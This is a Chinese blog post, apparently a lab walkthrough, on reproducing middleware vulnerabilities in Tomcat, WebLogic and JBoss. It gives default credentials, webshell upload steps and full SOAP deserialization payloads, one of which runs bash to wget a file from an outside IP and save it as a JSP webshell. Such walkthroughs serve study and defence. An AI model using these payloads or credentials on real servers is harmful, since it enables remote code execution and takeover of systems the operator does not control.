常见中间件漏洞

最新推荐文章于 2024-09-11 23:53:08 发布
最新推荐文章于 2024-09-11 23:53:08 发布
阅读量1.8k 收藏 29
点赞数 31
文章标签: 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66503195/article/details/140966956
版权

Tomcat

CVE-2017-12615

进入界面后抓包修改

在下面添加一个jsp一句话木马

链接

后台弱口令部署war包

进入界面后点击app这个按键进行登录 正面密码为tomcat

在这里添加一句话木马

在哥斯拉里生成一句话木马

把文件压缩成zip格式,并把后缀改为war

链接

WebLogic

后台弱⼝令GetShell

默认账号密码:weblogic/Oracle@123

weblogic常用弱口令:Default Passwords | CIRT.net这里注意,单个账号错误密码5次之后就会自动锁定。

上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传

链接

CVE-2017-3506

在IP后面添加wls-wsat/CoordinatorPortType进入

抓包并在下面添加

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
 <soapenv:Header>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <java><java version="1.4.0" class="java.beans.XMLDecoder">
 <object class="java.io.PrintWriter"> 
 <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/123.jsp</string>
 <void method="println">
<string>
 <![CDATA[
<% out.print("123"); %>
 ]]>
 </string>
 </void>
 <void method="close"/>
 </object></java></java>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body/>
</soapenv:Envelope>

/bea_wls_internal/shell.jsp

访问url

CVE-2019-2725

漏洞验证

/_async/AsyncResponseService

如果出现⼀下⻚⾯,则说明存在漏洞

抓包在下面添加

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"

xmlns:asy="http://www.bea.com/async/AsyncResponseService">

<soapenv:Header>

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>/bin/bash</string>

</void>

<void index="1">

<string>-c</string>

</void>

<void index="2">

<string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/12121.jsp

</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header><soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

链接

CVE-2018-2628

进入界面

使用工具(liqun工具箱)

CVE-2018-2894

账号密码weblogic/J1WrSilh

进入

http://112.126.80.8:8687/ws_utc/config.do

把镜像文件换成下面

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_intern al/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

点击base 在点高级

启动web服务在保存

来到ws_utc/config.do页面

修改

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

点击安全在这里添加

按F12查询搜索,找到对应时间戳

用蚁剑链接

Jboss

CVE-2017-7504

进入页面在后面添加jbossmg-httpil/HTTPServerlLServlet

如出现以下界面,说明存在此漏洞

CVE-2017-12149

Administration Console弱⼝令

/admin-console/login.seam?conversationId=4

账号密码 admin:vulhub

点击web

在此处上传文件

链接

http://112.126.80.8:8611/shell/shell.jsp

低版本JMX Console未授权

 

⾼版本JMX Console未授权

账号密码admin/vulhub

还好160
关注
  • 31
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见中间件漏洞复现
君莫hacker的博客
11-08 8899
常见中间件漏洞复现 中间件Tomcat Apache IIS Jboss Weblogic Nginx 目录tomcat中间件1.tomcat文件上传(CVE-2017-12615) tomcat中间件 1.tomcat文件上传(CVE-2017-12615) 环境:线上环境 vulfocus 影响版本:Tomcat 7.0.0 - 7.0.81
中间件常见漏洞
CSDNndscs的博客
07-17 473
中间件常见漏洞 一、IIS篇 iis6.0 存在 1.asp;.jpg 按asp处理的 ; 截断漏洞 iis6.0 存在 *.asp目录下的所有文件都会按照asp处理的 目录解析漏洞 iis6.0 存在 .asp .cer .cdx 结尾的文件都会按照asp文件进行解析 iis7.0 存在 在Fast-CGI运行模式下,任意文件,例:test.jpg后面加上/.php,会将test.jpg解析为php文件 iis Server 在Web服务扩展中开启了web DAV之后,支持多种请求,配合写入权限,可造
常见中间件漏洞的总结
qq_40898302的博客
06-07 9158
常见中间件漏洞总结
web常见中间件漏洞详解
m0_55854679的博客
08-31 422
它可以运行在几乎所有广泛使用的 计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。如果存在文件名类似的文件,则前面的6个字符是相同的,后面的数字进行递增。的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回。一样,属于配置方面的问题,错误的配置可导致目录遍历与源码的泄露。.
常见中间件漏洞(上)
qq_44768719的博客
11-14 1784
iis: 1.put漏洞 原因:在web服务扩展中开启了webDAV,配置了可以任意写入的权限 。 判断方法:将get请求改为options,根据返回的报文判断是否允许put方法 利用:可以用工具使用,自行百度 2.短文件名猜解: 原因:访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 利用形式:需要用到通配符,*可以匹配n个字符,也可以为0个。 举例:1. http://www.target.com/*~1****/a.aspx 2. http://www.t
常见中间件漏洞总结PPT
01-25
常见的WebLogic漏洞包括弱口令、SSRF(服务器端请求伪造)、任意文件上传和反序列化漏洞。利用这些漏洞,攻击者可以上传恶意war包,执行任意代码等。这些漏洞在Oracle WebLogic Server的多个版本中存在,如**.*.*.*....
Web中间件常见漏洞总结.pdf
06-14
中间件的安全问题常常成为黑客攻击的目标,因此深入理解和掌握Web中间件常见漏洞的知识对于网络安全防护至关重要。下面,我们将围绕文档提及的IIS中间件,总结其常见漏洞类型及修复建议。 1. IIS解析漏洞 IIS解析...
【合集】常见中间件漏洞
hackzkaq的博客
12-03 2995
1. IIS 1. PUT漏洞 用户配置不当,exp:https://github.com/hackping/HTTPMLScan.git 2. 短文件名猜解 IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 exp:https://github.com/WebBreacher/tilde_enum 3.远程代码执行(CVE-2017-7269)) **exp**:https://github.com/zcgonv
web中间件常见漏洞总结.pdf
12-14
以下是对这些常见漏洞的详细总结: 1. **SQL注入**:当Web应用未能正确过滤或转义用户输入的数据时,攻击者可以插入恶意SQL语句,从而获取敏感信息、篡改数据甚至完全控制数据库。 2. **跨站脚本(XSS)**:XSS...
国产化中间件正在侵蚀开源中间件
最新发布
zzlyx99的专栏
09-11 397
开源中间件的发展趋势表明,它们将继续在技术创新和生态建设中发挥重要作用,尤其是在云计算、大数据等新兴技术领域。开源中间件如Apache Kafka、RabbitMQ、ActiveMQ和RocketMQ等在市场上有着广泛的应用。它们在技术社区中得到了良好的支持,并且由于其开源特性,允许用户自由地修改和分发。
中间件是什么
QQ1817117243的博客
09-03 844
中间件是软件架构中的重要组成部分,提供了应用程序之间的通信、数据管理和其他服务。它使得开发者能够更高效地构建和维护复杂的分布式系统,尤其是在微服务架构和云计算环境中。
中间件】-容器编排平台Kubernetes简介
knoci的博客
09-08 1127
Kubernetes是一个可移植、可扩展的开源平台,用于管理容器化的工作负载和服务,可促进声明式配置和自动化。Kubernetes 拥有一个庞大且快速增长的生态,其服务、支持和工具的使用范围相当广泛。Kubernetes这个名字源于希腊语,意为“舵手”或“飞行员”。K8s 这个缩写是因为 K 和 s 之间有 8 个字符的关系。Google 在 2014 年开源了 Kubernetes 项目。
分布式中间件-几个常用的消息中间件
wendao76的专栏
09-08 1002
分布式, 消息中间件
分布式中间件-redis相关概念介绍
wendao76的专栏
09-11 701
是一个开源的、基于内存的、使用ANSI C语言编写的Key-Value数据库。它支持多种数据结构,并提供丰富的API,使其成为高性能的缓存、消息队列、实时分析等场景的理想选择。
Gin框架中的全局中间件中间件传值
一起coding,一起嗨。
09-04 924
Gin框架中的全局中间件中间件传值
程序设计竞赛题册生成.zip
09-11
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
海康威视SDK实例QtDemo显示NVR视频窗口(Linux+Qt)
09-11
在《海康威视客户端iVMS-4200连接NVR》 https://blog.csdn.net/chentuo2000/article/details/119298486 一文中我们通过海康威视客户端iVMS-4200连接NVR。 本文我们通过海康SDK连接NVR。
Proteus是英国Lab Center Electronics公司出版的EDA工具软件,是一款功能强大的电子电路仿真和物理特性
09-11
proteusProteus是英国Lab Center Electronics公司出版的EDA工具软件,是一款功能强大的电子电路仿真和物理特性模拟软件,广泛应用于电子工程师和教育者之间。以下是关于Proteus的详细介绍: 一、功能特点 原理图设计:Proteus提供了智能原理图设计功能,拥有丰富的器件库,包含超过27000种元器件,可方便地创建新元件,并通过模糊搜索快速定位所需器件。 电路仿真:该软件支持从原理图布图到代码调试,再到单片机与外围电路协同仿真的全过程。其混合仿真功能基于工业标准SPICE3F5,可实现数字/模拟电路的混合仿真,拥有超过27000个仿真器件,并可通过内部原型或使用厂家的SPICE文件自行设计仿真器件。 单片机协同仿真:Proteus支持多种主流 文心大模型3.5生成
springboot基于大数据的音乐数据可视化分析系统毕业论文.docx
09-11
springboot基于大数据的音乐数据可视化分析系统毕业论文.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值